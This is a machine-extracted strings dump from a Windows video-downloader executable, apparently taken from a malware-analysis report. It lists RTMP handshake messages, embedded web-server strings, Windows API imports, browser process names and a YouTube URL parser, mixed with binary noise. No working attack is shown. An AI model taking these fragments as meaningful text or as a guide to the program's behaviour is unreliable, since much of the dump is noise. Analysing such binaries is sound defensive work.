%s, b64(%d) = %s

%s, b64(md5_1) = %s

%s, md5(%s%s%s) =>

%s, par:"%s" = val:"%s"

%s, need to set pubUser & pubPasswd for publisher auth

%s, wrong pubUser & pubPasswd for publisher auth

%-22.*s%s

%s, error decoding meta data packet

%s, received: chunk size change to %d

%s: server BW = %d

%s: client BW = %d %d

%s, recv returned %d. GetSockError(): %d (%s)

POST /%s%s/%d HTTP/1.1

Host: %.*s:%d

Content-length: %d

HTTP/1.1 200

%s, RTMP send error %d (%d bytes)

%s: fd=%d, size=%d

Invoking %s

sanity failed!! trying to send header of type: 0xx.

%s, failed to allocate packet

FCSubscribe: %s

UsherToken: %s

%s, %d, pauseTime=%d

%s, seekTime=%d, stopTime=%d, sending play: %s

sending ctrl. type: 0xx

%s: Ignoring SWFVerification request, use --swfVfy!

%s: SWFVerification Type %d request not supported! Patches welcome...

%s, SWFVerification ping received:

%s, Stream Begin %d

%s, Stream EOF %d

%s, Stream Dry %d

%s, Stream IsRecorded %d

%s, Ping %d

%s, Stream BufferEmpty %d

%s, Stream BufferReady %d

%s, Stream xx %d

%s, received ctrl. type: %d, len: %d

%s, RTMP socket closed by peer

%s, No valid HTTP response found

%s, failed to read RTMP packet body. len: %u

%s, failed to read extended timestamp

%s, failed to read RTMP packet header. type: %x

%s, m_nChannel: %0x

%s, failed to read RTMP packet header 3nd byte

%s, failed to read RTMP packet header 2nd byte

%s, failed to read RTMP packet header

%s: fd=%d

%s: client signature does not match!

%s: Handshaking finished....

%s: Genuine Adobe Flash Media Server

%s: Server not genuine Adobe!

%s: Signature calculated:

%s: Digest key:

%s: Server sent signature:

%s: Wait, did the server just refuse signed authentication?

%s: Client signature calculated:

%s: Calculated digest key from secure key and server digest:

%s: Secret key:

%s: Wrong secret key position!

%s: Server DH public key offset: %d

%s: FMS Version : %d.%d.%d.%d

%s: Server Uptime : %d

%s: Type mismatch: client sent %d, server answered %d

%s: Type Answer : X

%s: Initial client digest:

%s: Client digest offset: %d

%s: Couldn't write public key!

%s: Couldn't generate Diffie-Hellmann public key!

%s: DH pubkey position: %d

%s: Couldn't initialize Diffie-Hellmann!

%s: Client type: X

%s: Genuine Adobe Flash Player

%s: Client not genuine Adobe!

%s: Client sent signature:

%s: 2nd handshake:

%s: Sending handshake response:

%s: Server signature calculated:

%s: Client DH public key offset: %d

%s: Player Version: %d.%d.%d.%d

%s: Client Uptime : %d

%s: Initial server digest:

%s: Server digest offset: %d

%s: Unknown version x

%s: Type Requested : X

%s, RTMP connect failed.

%s, handshaked

%s, handshake failed.

%s, ... connected, handshaking

%s, Could not connect for handshake

%s, no SSL/TLS support

%s, SOCKS returned error code %d

%s, failed to create socket. Error: %d

%s, SOCKS negotiation failed.

%s ... SOCKS negotiation

%s, failed to connect socket. %d (%s)

Closing connection: %s

%s, onStatus: %s

trying to connect with redirected url

%s, error description: %s

%s, received error for method call <%s>

%s, received result id %f without matching request

%s, received result for method call <%s>

%s, server invoking <%s>

%s, error decoding invoke packet

%s, Sanity failed. no string method in invoke packet

%s, flex shared object, size %u bytes, not supported, ignoring

%s, flex message, size %u bytes, not fully supported

%s, received: notify %u bytes

%s, shared object, not supported, ignoring

%s, received: invoke %u bytes

%s, unknown packet type received: 0xx

%s, flex stream send, size %u bytes, not supported, ignoring

%s, received: bytes read report

Wrong data size (%u), stream corrupted, aborting!

Couldn't find the seeked keyframe in this chunk!

First packet does not contain keyframe, all timestamps are smaller than the keyframe timestamp; probably the resume seek failed?

FLV Stream: Keyframe doesn't match!

Found keyframe with resume-keyframe timestamp!

Checked keyframe successfully!

ignoring too small audio packet: size: %d

ignoring too small video packet: size: %d

Got Play.Complete or Play.Stop from server. Assuming stream is complete

%s: Failed to close listening socket, error %d

Caught signal: %d, cleaning up, just a second...

-c, --cert cert RTMPS cert

-k, --key key RTMPS key

-p, --port port Overrides the port in the rtmp url

%s, _beginthread failed with %d

Unknown command '%c', ignoring

-o %s

-j "%s"

-p "%s"

-W "%s"

-f "%s"

-a "%s"

-r "%s"

%s, client invoking <%s>

%s, received packet type X, size %u bytes

%s: accept failed

%s: processed request

%s: accepted connection from %s

%s, listen failed

%s, TCP bind failed for port number: %d

%s, couldn't create socket

chrome.exe iexplore.exe firefox.exe Safari.exe WebKit2WebProcess.exe opera.exe

._-$,;~()

.mpeg

video/webm

.webm

.xslt

.json

audio/x-mpegurl

.torrent

.jpeg

.shtml

.shtm

.html

url_rewrite_patterns

ssl_certificate

listening_ports

index.html,index.htm,index.cgi,index.shtml,index.php,index.lp

**.shtml$|**.shtm$

mydomain.com

**.cgi$|**.pl$|**.php$

SSL_CTX_use_certificate_chain_file

SSL_CTX_set_default_passwd_cb

SSL_CTX_use_certificate_file

SSL_CTX_use_PrivateKey_file

%s %s:

[0lu] [error] [client %s]

%.*s%s

%d-%3s-%d %d:%d:%d

%*3s, %d %3s %d %d:%d:%d

%d %3s %d %d:%d:%d

%d/%3s/%d %d:%d:%d

%[^:]:%[^:]:%s

HTTP/1.1 401 Unauthorized

WWW-Authenticate: Digest qop="auth", realm="%s", nonce="%lu"

%s:%s:%s

%s.tmp

<tr><td><a href="%s%s%s">%s%s</a></td><td> %s</td><td>  %s</td></tr>

%d-%b-%Y %H:%M

**.htpasswd$

%s%c%s

%a, %d %b %Y %H:%M:%S GMT

HTTP/

%s: CGI env buffer truncated for [%s]

HTTP_%s=%s

REMOTE_USER=%s

PERLLIB=%s

SystemDrive=%s

SYSTEMROOT=%s

COMSPEC=%s

PATH_INFO=%s

PATH=%s

CONTENT_LENGTH=%s

QUERY_STRING=%s

CONTENT_TYPE=%s

HTTPS=%s

PATH_TRANSLATED=%s

SCRIPT_FILENAME=%s

SCRIPT_NAME=%.*s%s

REQUEST_URI=%s

REMOTE_PORT=%d

REMOTE_ADDR=%s

REQUEST_METHOD=%s

SERVER_PORT=%d

SERVER_PROTOCOL=HTTP/1.1

DOCUMENT_ROOT=%s

SERVER_ROOT=%s

SERVER_NAME=%s

Cannot SSI #exec: [%s]: %s

Bad SSI #exec: [%s]

HTTP/1.1 200 OK

<d:response><d:href>%s</d:href><d:propstat><d:prop><d:resourcetype>%s</d:resourcetype><d:getcontentlength>%I64d</d:getcontentlength><d:getlastmodified>%s</d:getlastmodified></d:prop><d:status>HTTP/1.1 200 OK</d:status></d:propstat></d:response>

HTTP/1.1 207 Multi-Status

%d.%d.%d.%d%n

%d.%d.%d.%d/%d%n

%lf%c

%s/%s

boundary=™s

HTTP/1.1 302 Found

Location: hXXps://%s:%d%s

24[^:]

%d.%d.%d.%d:%d%n

Cannot add SSL socket, is -ssl_certificate option set?

%s: %.*s: invalid port spec. Expecting list of: %s

[IP_ADDRESS:]PORT[s|p]

%s: cannot bind to %.*s: %s

set_ports_option

%s - %s [%s] "%s %s HTTP/%s" %d %I64d

%d/%b/%Y:%H:%M:%S %z

%s: subnet must be [ |-]x.x.x.x[/x]

Cannot open %s: %s

calloc(): %s

connect(%s:%d): %s

socket(): %s

gethostbyname(%s): %s

%s: %s is not allowed to connect

HTTP/1.1 %d %s

Content-Length: %d

Connection: %s

Error %d: %s

%s: CreateProcess(%s): %ld

%s%s%s\%s

%.*s%c%s

.htpasswd

fopen(%s): %s

%s: cannot open %s: %s

<tr><td><a href="%s%s">%s</a></td><td> %s</td><td>  %s</td></tr>

<html><head><title>Index of %s</title><style>th {text-align: left;}</style></head><body><h1>Index of %s</h1><pre><table cellpadding="0"><tr><th><a href="?n%c">Name</a></th><th><a href="?d%c">Modified</a></th><th><a href="?s%c">Size</a></th></tr><tr><td colspan="3"><hr></td></tr>

Error: opendir(%s): %s

Date: %s

Last-Modified: %s

Etag: %s

HTTP/1.1 100 Continue

Cannot create CGI pipe: %s

fopen: %s

CGI program sent malformed or too big (>%u bytes) HTTP headers: [%.*s]

Cannot spawn CGI process [%s]: %s

put_dir(%s): %s

HTTP/1.1 %d OK

Bad SSI #include: [%s]

Cannot open SSI #include: [%s]: fopen(%s): %s

%s: SSI tag is too large

%s: unknown SSI command: "%s"

SSI #include level is too deep (%s)

Method %s is not implemented

HTTP/1.1 301 Moved Permanently

Location: %s/

remove(%s): %s

Bad HTTP version

Bad HTTP version: [%s]

Invalid URI: [%s]

%s: option value cannot be NULL

Invalid option: %s

warning: %s: duplicate option

Hello from mongoose! Remote port: %d

HttpSendRequestW failed with error code

HttpOpenRequestW failed with error code

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

1.2.5

inflate 1.2.5 Copyright 1995-2010 Mark Adler

Visual C   CRT: Not enough memory to complete call to strerror.

cmd.exe

Broken pipe

Inappropriate I/O control operation

Operation not permitted

portuguese-brazilian

operator

GetProcessWindowStation

C:\BUILDS\Build_YTDownloader\Client\WFP\exe\RemoteRelease\YTDownloader.pdb

.?AVCHttp@@

<>"#{}|\^~[]`' ?&

.?AVCRtmpe@@

.?AV?$IBaseInterface@VIKeysBank@@@@

.?AVIKeysBank@@

.?AV?$CBaseInterface@VCKeysBank@@VIKeysBank@@@@

.?AVCKeysBank@@

.?AVCRtmpDataProperty@@

.?AVCRtmpPacket@@

.?AVCRtmpParser@@

.?AVChromeBrowserWindow@@

.?AVFirefoxBrowserWindow@@

.?AVOperaBrowserWindow@@

HTTP://

.?AVHttpParser@@

.?AVCHttpDownload@@

zcÁ

WinExec

CreatePipe

KERNEL32.dll

MsgWaitForMultipleObjectsEx

EnumChildWindows

USER32.dll

GDI32.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegOpenKeyW

RegEnumKeyW

RegNotifyChangeKeyValue

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

COMCTL32.dll

WS2_32.dll

LIBEAY32.dll

HttpEndRequestW

HttpQueryInfoW

HttpSendRequestW

HttpSendRequestExW

HttpAddRequestHeadersW

HttpOpenRequestW

WININET.dll

VERSION.dll

CertGetNameStringW

CertFreeCertificateContext

CryptMsgClose

CertCloseStore

CertFindCertificateInStore

CryptMsgGetParam

CRYPT32.dll

PSAPI.DLL

IsValidURL

urlmon.dll

GdiplusShutdown

gdiplus.dll

GetCPInfo

GetProcessHeap

nnn%XXX

pppaSSS

<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>

<assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>

89x9

0-161T1k1}1

0(191?1`2

8&9-9}9

<041&3.3

;$;(;,;0;4;8;<;@;

<(</<4<8<<<]<

<&=,=0=4=8=

= =$=(=,=0=4=8=

: :(:,:0;4;

? ?$?,?0?8?<?

? ?(?,?0?

1 2,242\2

?$?0?8?`?

8(848\8|8

0$000\0|0

>(>4><>`>

?$?<?@?\?`?

0 0@0`0|0

3 3@3`3|3

1$1,141<1

HTTP/1.0

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

HTTP/1.1

Content-Disposition: form-data; name="%s"

XXX

Content-Type: multipart/form-data; boundary=%s

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Windows CE

Windows 7

Windows Vista

Windows 2003 Server

Windows XP

Windows 2000

Windows NT

Windows Me

Windows 98

Windows 95

%sLow\%s\

%C:\Users\Public\Documents\%s\%s\

%s\%s\%s\

%s\Application Data\%s\%s\

[CEventsThread::SetTimeoutResolution] From: %d -> To: %d

[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms

[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms

[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d

[CEventsThread::WaitForMultipleEvents] TID=%X

[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d

[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d

[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...

[CEventsThread::Start - Leave] TID=%X

[CEventsThread::Start] ___Error - Failed to create thread: %X

[CEventsThread::Stop - Leave] TID=%X

[CEventsThread::Stop - Enter] TID=%X

[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d

[CEventsThread::AlertEvent] ___Error SetEvent failed: %d

[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d

[CEventsThread::AlertEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d

[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d

[CEventsThread::SetGlobalEvent] Event: %d

[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d

[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d

[CEventsThread::ResetEvent] ___Error Not found Event: %d

[CEventsThread::ResetEvent] Event: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d

[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d

[CEventsThread::WaitEvent] TID=%X

[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d

[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d

[CEventsThread::RemoveEvent] ___Error Not found Event: %d

[CEventsThread::RemoveEvent] Event: %d

[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d

[CEventsThread::Cleanup] Closing Handle: %d

[CEventsThread::Work] TID=%X - Exit !!!

[CEventsThread::Work] WAIT_ABANDONED - %d

[CEventsThread::Work] TID=%X

[CEventsThread::AddEvent] ___Warning event handle already exists %d

[CEventsThread::AddEvent] ___Error invalid event handle %d

ConfigDB.dll

config.xml

%%X

<d/d/%d d:d:d::d 0x%X>

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue

[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx

[SbTracer::RecursiveCreateDirectory] Directory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s

[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s

[SbTracer::FormatFilePath] Log Path: %s

[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s

[SbTracer::FormatFilePath] ___Warning - No Log folder: %s

[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s

\StringFileInfo\x\%s

[SbTracer::ReadConfiguration] Trace Max Size: %d

[SbTracer::ReadConfiguration] Trace Time Stamp: %d

[SbTracer::ReadConfiguration] Trace Time Limit: %d

[SbTracer::ReadConfiguration] Trace Backup: %d

[SbTracer::ReadConfiguration] Trace Destination: %d

[SbTracer::ReadConfiguration] Trace Level: %d

[SbTracer::BackupTraceFile] %s

[SbTracer::OpenTraceFile] Done %s

[SbTracer::OpenTraceFile] ___Error: %d, File: %s

[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s

CertGetNameString failed.

CryptDecodeObject failed with %x

CertFindCertificateInStore failed with %x

MoreInfo Link : %s

Publisher Link : %s

Program Name : %s

CryptMsgGetParam failed with %x

CryptQueryObject failed with %x

user32.dll

WININET.DLL

kernel32.dll

d/d/%d d:d:d::d

%d.%d.%d.%d

[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d

"%s" "%s"

"%s" %s

[CUtils::GetDAPExeLocation] ___Error read DAP location from %s

[CUtils::GetDAPExeLocation] Name: %s

[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s

[CUtils::GetDAPPipeName] Name: %s

PipeName

[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s

[CUtils::GetDAPWindowName] Name: %s

[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d

[CClientRtmpe::HandShake] ___Error DiffieHellman - GetPublicKey

[CClientRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key

[CClientRtmpe::operator =] Key Out: %p

[CClientRtmpe::operator =] Key In:

[CClientRtmpe::operator =]

[CClientRtmpe::OnHandshake] Step 3 - update the keystreams

[CClientRtmpe::OnHandshake] ___Error Step 3 - ___Error ComputeSharedSecretKey

[CClientRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey

[CClientRtmpe::OnHandshake] Step 2 - Client version: %x

[CClientRtmpe::OnHandshake] Step 2 - Client up time: %d

[CClientRtmpe::OnHandshake] Step 2 - Protocol: %d

[CKeysBank::Work] Exit...

[CKeysBank::Work] Enter...

[CKeysBank::Start]

[CKeysBank::Stop]

[CKeysBank::GetPublicKey] Remove Key, Total: %d

[CKeysBank::GenerateKey] Add Key, Total: %d

[CKeysBank::GenerateKey] ___Error DiffieHellman.GenerateKey

[CKeysBank::GenerateKey] ___Error DiffieHellman.Init

[CRtmpe::operator =] Key Out: %p

[CRtmpe::operator =] Key In:

[CRtmpe::operator =]

[CRtmpe::Initialize] Cache Writer: %p

[CRtmpe::ParseHeader] Protocol - RTMPE

[CRtmpe::ParseHeader] Protocol - RTMP

[CRtmpe::ParseHeader]

[CRtmpe::ParseData] Got all %d/%d bytes

[CRtmpe::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)

[CRtmpe::ParseData]

[CRtmpe::Encrypt] Encryped %d bytes, Key: %p

[CRtmpe::Decrypt] Decrypted %d bytes, Key: %p

[CRtmpe::ParseBuffer] Analyze Next Packet...

[CRtmpe::HandShake] Step 1: Complete

[CRtmpe::HandShake] ___Error Step 1: Writing client signature to server

[CRtmpe::HandShake] ___Error Step 1: DiffieHellman - GetPublicKey

[CRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key

[CRtmpe::HandShake] Step 1: Start...

[CRtmpe::UpdateBuffer] Analyzed %d/%d bytes

[CRtmpe::UpdateBuffer] Handshake already completed

[CRtmpe::UpdateBuffer] Analyzing %d bytes...

[CRtmpStream::OnHandShake] ___Error - Unknown step

[CRtmpe::OnHandshake] Step 3 - Complete

[CRtmpe::OnHandshake] Step 3 - update the keystreams

[CRtmpe::OnHandshake] Step 3 - InitRC4Encryption

[CRtmpe::OnHandshake] ___Error Step 3: m_DiffieHellman - ComputeSharedSecretKey

[CRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey

[CRtmpe::OnHandshake] ___Error Step 3: Writing client response

[CRtmpe::OnHandshake] Step 3: Start...

[CRtmpe::OnHandshake] ___Error Step 2: *** Server response validation ***

[CRtmpe::OnHandshake] ___Warning - server version

[CRtmpe::OnHandshake] ___Error Step 2: Reading server response

[CRtmpe::OnHandshake] ___Error Step 2: *** Server signature validation ***

[CRtmpe::OnHandshake] Step 2 - Server version: %x

[CRtmpe::OnHandshake] Step 2 - Server up time: %d

[CRtmpe::OnHandshake] ___Error Step 2: Reading server signature

[CRtmpe::OnHandshake] Step 2 - Protocol: %d

[CRtmpe::OnHandshake] Step 2: Start...

[CRtmpPacket::Reset]

[CRtmpPacket::DumpHeader] Info Field: %d

[CRtmpPacket::DumpHeader] Packet Type: %d

[CRtmpPacket::DumpHeader] Packet Length: %d

[CRtmpPacket::DumpHeader] Absolute Time: %d

[CRtmpPacket::DumpHeader] Time: %d

[CRtmpPacket::DumpHeader] Channel: %d

[CRtmpPacket::DumpHeader] Header Type: %d

[CRtmpPacket::DumpHeader] Header Size: %d

[CRtmpPacket::DumpHeader] Header Byte: 0x%.02X

[CRtmpPacket::ParseHandshakeHeader] ___Error - Header already parsed

[CRtmpPacket::ParseFlvHeader] Absolute Time: %d

[CRtmpPacket::ParseFlvHeader] Packet Length: %d

[CRtmpPacket::ParseFlvHeader] Packet Type: %d

[CRtmpPacket::ParseFlvHeader] Channel: %d

[CRtmpPacket::ParseFlvHeader] Header Type: %d

[CRtmpPacket::ParseFlvHeader] Header Size: %d

[CRtmpPacket::ParseFlvHeader] ___Warning - %d/%d header bytes

[CRtmpPacket::ParseFlvHeader] ___Error - No bytes to analyze

[CRtmpPacket::ParseFlvHeader] ___Error - Header already parsed

[CRtmpPacket::AppendData] Appended: %d (Total: %d/%d)

[CRtmpPacket::AppendData] ___Error - out of memory

[CRtmpPacket::AppendData] ___Warning - no bytes to append

[CRtmpPacket::Allocate] Allocated %d (Total: %d)

[CRtmpPacket::ParseHeader] ___Error - Channel: %d > 9

[CRtmpPacket::ParseHeader] Extended Time: %d

[CRtmpPacket::ParseHeader] Info Field: %d

[CRtmpPacket::ParseHeader] ___Warning - Packet Length: %d > 1M

[CRtmpPacket::ParseHeader] Packet Type: %d

[CRtmpPacket::ParseHeader] Packet Size: %d

[CRtmpPacket::ParseHeader] Time: %d

[CRtmpPacket::ParseHeader] Channel: %d

[CRtmpPacket::ParseHeader] Header Type: %d

[CRtmpPacket::ParseHeader] Header Size: %d

[CRtmpPacket::ParseHeader] Header Byte: 0x%.02X

[CRtmpPacket::ParseHeader] ___Warning - %d/%d header bytes

[CRtmpPacket::ParseHeader] ___Error - No bytes to analyze

[CRtmpPacket::ParseHeader] ___Error - Header already parsed

[CRtmpParser::Stop]

[CRtmpParser::ProcessData] ___Error - Unknown Packet Type: %d, Offset: %d

[CRtmpParser::ProcessData] Analyze Data: %d bytes

[CRtmpParser::ProcessData] ___Warning - Packet not ready for Data Processing

[CRtmpParser::OnHandshake] Step 4: Complete

[CRtmpParser::OnHandshake] Step 3: Complete

[CRtmpParser::OnHandshake] Step 2 - Server version: %d.%d.%d.%d

[CRtmpParser::OnHandshake] Step 2 - Server up time: %d

[CRtmpParser::OnHandshake] Step 1 - Client version: %d.%d.%d.%d

[CRtmpParser::OnHandshake] Step 1 - Client up time: %d

[CRtmpParser::OnHandshake] Protocol State: %d

[CRtmpParser::OnAudio]

[CRtmpParser::OnVideo]

[CRtmpParser::OnFLV]

[CRtmpParser::OnData]

[CRtmpParser::SetTimeStartPosition] Time: %d

[CRtmpParser::SetTimeEndPosition] Time: %d

[CRtmpParser::Close]

[CRtmpParser::OnError]

[CRtmpParser::SetAbsoluteTime] Client Absolute Time: %d (Max: %d)

[CRtmpParser::SetAbsoluteTime] Server Absolute Time: %d (Max: %d)

[CRtmpParser::Sync - %p]

[CRtmpParser::ParseFlvHeader]

[CRtmpParser::ParseData] Accumulated all %d/%d bytes

[CRtmpParser::ParseData] Chunk not ready

[CRtmpParser::ParseData] Going to append %d bytes

[CRtmpParser::ParseData] Got all %d/%d bytes

[CRtmpParser::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)

[CRtmpParser::ParseData] ___Warning no data

[CRtmpParser::ParseData]

[CRtmpParser::ParseDataType] ___Error - Unknown Data Type: %d, Offset: %d

[CRtmpParser::ParseDataType] Date %f %d (Offset: %d)

[CRtmpParser::ParseDataType] Static Array %d (Offset: %d)

[CRtmpParser::ParseDataType] EOF Object (Offset: %d)

[CRtmpParser::ParseDataType] ECMA Array %d (Offset: %d)

[CRtmpParser::ParseDataType] Object (Offset: %d)

[CRtmpParser::OnChangeChunkSize] %d -> %d

[CRtmpParser::OnChangeChunkSize]

[CRtmpParser::OnReadBytes] Bytes read: %d

[CRtmpParser::OnReadBytes]

[CRtmpParser::OnMetadata]

[CRtmpParser::Reset - %p]

[CRtmpParser::ReadObject] ___Error %s - %d (Offset: %d) - Unknown Data Type

[CRtmpParser::ReadObject] EOF Object (Offset: %d)

[CRtmpParser::ReadObject] %s - Long String: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Date: %g (Offset: %d)

[CRtmpParser::ReadObject] %s - Static Array: %d (Offset: %d)

[CRtmpParser::ReadObject] %s - ECMA Array: %d (Offset: %d)

[CRtmpParser::ReadObject] %s - NULL (Offset: %d)

[CRtmpParser::ReadObject] %s - Object (Offset: %d)

[CRtmpParser::ReadObject] %s - String: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Boolean: %s (Offset: %d)

[CRtmpParser::ReadObject] %s - Numeric: %g (Offset: %d)

[CRtmpParser::ParseHandshakeHeader] Protocol - RTMPE

[CRtmpParser::ParseHandshakeHeader] Protocol - RTMP

[CRtmpParser::ParseHandshakeHeader]

[CRtmpParser::ParseHeader] Absolute Time: %d

[CRtmpParser::ParseHeader] New Time: %d

[CRtmpParser::ParseHeader] New Absolute Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Info Field: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer Bytes: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer Length: %d

[CRtmpParser::ParseHeader] _Prev Packet - Buffer: %p

[CRtmpParser::ParseHeader] _Prev Packet - Packet Type: %d

[CRtmpParser::ParseHeader] _Prev Packet - Packet Size: %d

[CRtmpParser::ParseHeader] _Prev Packet - Absolute Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Time: %d

[CRtmpParser::ParseHeader] _Prev Packet - Original Header Size: %d

[CRtmpParser::ParseHeader]

[CRtmpParser::UpdateBufferFromServer] Analyzed no bytes

[CRtmpParser::UpdateBufferFromServer] Analyzed %d/%d, Write: %d, Discard: %d

[CRtmpParser::UpdateBufferFromServer] Analyze Next Buffer... (Left: %d)

[CRtmpParser::UpdateBufferFromServer] Decrypt %d/%d bytes

[CRtmpParser::UpdateBufferFromServer] *** Data file Ended at Absolute Time: %d ***

[CRtmpParser::UpdateBufferFromServer] *** Data file Started at Absolute Time: %d ***

[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard the rest of the data!

[CRtmpParser::UpdateBufferFromServer] Decrypt %d bytes

[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard all data!

[CRtmpParser::UpdateBufferFromServer] Analyzing %d bytes...

[CRtmpParser::UpdateBufferFromClient] Analyzed %d/%d, Write: %d, Discard: %d

[CRtmpParser::UpdateBufferFromClient] Encrypt %d bytes

[CRtmpParser::UpdateBufferFromClient] Decrypt %d/%d bytes

[CRtmpParser::ParseBuffer] Analyze Next Packet... (Left: %d)

[CRtmpParser::UpdateBufferFromClient] Decrypt %d bytes

[CRtmpParser::UpdateBufferFromClient] ___Warning - Wait for the server handshake to complete...

[CRtmpParser::UpdateBufferFromClient] Analyzed no bytes

[CRtmpParser::UpdateBufferFromClient] Analyzing %d bytes...

[CRtmpParser::operator = %p] <= %p

[CRtmpParser::ParseFlvBuffer] Analyze Next FLV Buffer...

[CRtmpParser::AddDownloadFlowCommand] Method: %s -> Command: %s, Param: %d

[CRtmpParser::OnPing] SWFVerification

[CRtmpParser::OnPing] Time: %d

[CRtmpParser::OnPing] -- Unknown %d --

[CRtmpParser::OnPing] Stream buffer ready %d

[CRtmpParser::OnPing] Pause time: %d

[CRtmpParser::OnPing] Stream buffer empty %d

[CRtmpParser::OnPing] Pong %d

[CRtmpParser::OnPing] Stream is recorded %d

[CRtmpParser::OnPing] Ping %d

[CRtmpParser::OnPing] Stream dry %d

[CRtmpParser::OnPing] Stream EOF %d

[CRtmpParser::OnPing] Stream begin %d

[CRtmpParser::OnPing] Type: %d

[CRtmpParser::OnPing]

[CRtmpParser::OnServerBW] Server Bandwidth: %d

[CRtmpParser::OnServerBW]

[CRtmpParser::OnClientBW] Client Bandwidth: %d

[CRtmpParser::OnClientBW]

[CRtmpParser::OnInvoke] ___Error - Unknown Invokde method: %s

[CRtmpParser::OnInvoke] setBandwidthLimit( %g, %g )

[CRtmpParser::OnInvoke] getStats

[CRtmpParser::OnInvoke] secureTokenResponse: Token = %s

[CRtmpParser::OnInvoke] closeStream: StreamID = %g

[CRtmpParser::OnInvoke] deleteStream: StreamID = %g

[CRtmpParser::OnInvoke] releaseStream: PlayPath = %s

[CRtmpParser::OnInvoke] startStream: PlayPath = %s

[CRtmpParser::OnInvoke] createStream: StreamID = %g

[CRtmpParser::OnInvoke] %s( '%s', '%s', '%s' )

[CRtmpParser::OnInvoke] %s( '%s', '%s' )

[CRtmpParser::OnInvoke] seek( '%d' )

[CRtmpParser::OnInvoke] %s( '%d', '%g' )

[CRtmpParser::OnInvoke] %s( '%s' ), PacketInfo: %d

[CRtmpParser::OnInvoke] onStatus - code: %s, level: %s

[CRtmpParser::OnInvoke] _error - code: %s, level: %s

[CRtmpParser::OnInvoke] %s( '%s' )

[CRtmpParser::OnInvoke] _result createStream: StreamID = %g

[CRtmpParser::OnInvoke] _result connect - AMF3

[CRtmpParser::OnInvoke] _result connect: %s

[CRtmpParser::OnInvoke] _result for Method: %s

[CRtmpParser::OnInvoke] Method: %s

[CRtmpParser::OnInvoke]

Download Helper SendMsgToBtn, url: %s

Could not find converter registry key, %ws

Could not create process, error %x, proc %ws

RegContentType%d

RegRawData%d

RegProtocol%d

RegAgent%d

RegCookie%d

1.0.1.0

RegFileName%d

RegUrl

RegURL%d

%ws_%d.log

- Mozilla Firefox

- Windows Internet Explorer

opera

firefox

chrome

OPERA

opera.exe

safari.exe

firefox.exe

iexplore.exe

chrome.exe

explorer.exe

Google Chrome

Chrome_WidgetWin_1

Firefox

FirefoxBrowserWindow Found browser window, 0x%x

FirefoxBrowserWindow Found button window, 0x%x

IE9BrowserWindow Found browser window, 0x%x

IE9BrowserWindow Found button window, 0x%x

OperaBrowserWindow Found browser window, 0x%x

OperaBrowserWindow Found button window, 0x%x

Opera

SafariBrowserWindow Found browser window, 0x%x

SafariBrowserWindow Found button window, 0x%x

hXXp://VVV.youtube.com/watch?v=

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1

YTParser url not valid %ws

SBMonitor.log

Error no signature found at %s

GetVideoUrlAndSizeFromWatchPage Could not extract url_encoded_fmt_stream_map params.

GetVideoUrlAndSizeFromWatchPage

YTParser could not find valid url, not downloading

hXXp://VVV.youtube.com/get_video_info?video_id=

GetVideoUrlAndSizeFromVideoInfo

Failed processing urls from watch page.

reportLevel

